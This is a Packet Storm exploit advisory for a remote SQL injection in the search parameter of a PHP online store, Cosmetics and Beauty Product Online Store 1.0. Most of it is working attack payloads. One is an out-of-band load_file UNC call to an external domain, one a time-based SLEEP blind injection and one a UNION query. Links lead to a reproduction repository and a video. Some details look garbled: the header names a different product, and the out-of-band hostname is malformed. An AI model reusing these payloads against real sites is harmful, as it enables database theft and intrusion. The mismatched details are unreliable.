exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cosmetics And Beauty Product Online Store 1.0 SQL Injection

Cosmetics And Beauty Product Online Store 1.0 SQL Injection
Posted Feb 18, 2022
Authored by nu11secur1ty

Cosmetics and Beauty Product Online Store version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 8c96834a21c7c1412cd4faf4cbbcbefa7d9d6c0ab4c866b01e5136099c7e1647

Cosmetics And Beauty Product Online Store 1.0 SQL Injection

Change Mirror Download
## Title: Cosmetics-and-Beauty-Product-Online-Store v1.0 remote SQL-Injections
## Author: nu11secur1ty
## Date: 02.18.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html
## CVE-Medical Store Management System v1.0


## Description:
The search parameter on Cosmetics-and-Beauty-Product-Online-Store v1.0
appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html\\vcu'))+'
was submitted in the search parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL


[+] Payloads:

```mysql
---
Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select
load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\vcu'))+'')
AND (SELECT 8319 FROM (SELECT(SLEEP(3)))tZAp) AND ('YVjM'='YVjM

Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select
load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\vcu'))+'')
UNION ALL SELECT
47,47,47,CONCAT(0x717a6b7171,0x5371436d48496454644b78506c746c637876537176426748654f4644545544616b50674e41505442,0x7170787671),47,47,47,47,47,47--
-
---

```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store/SQL-Injection)

## Proof and Exploit:
[href](https://streamable.com/9b2avg)


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close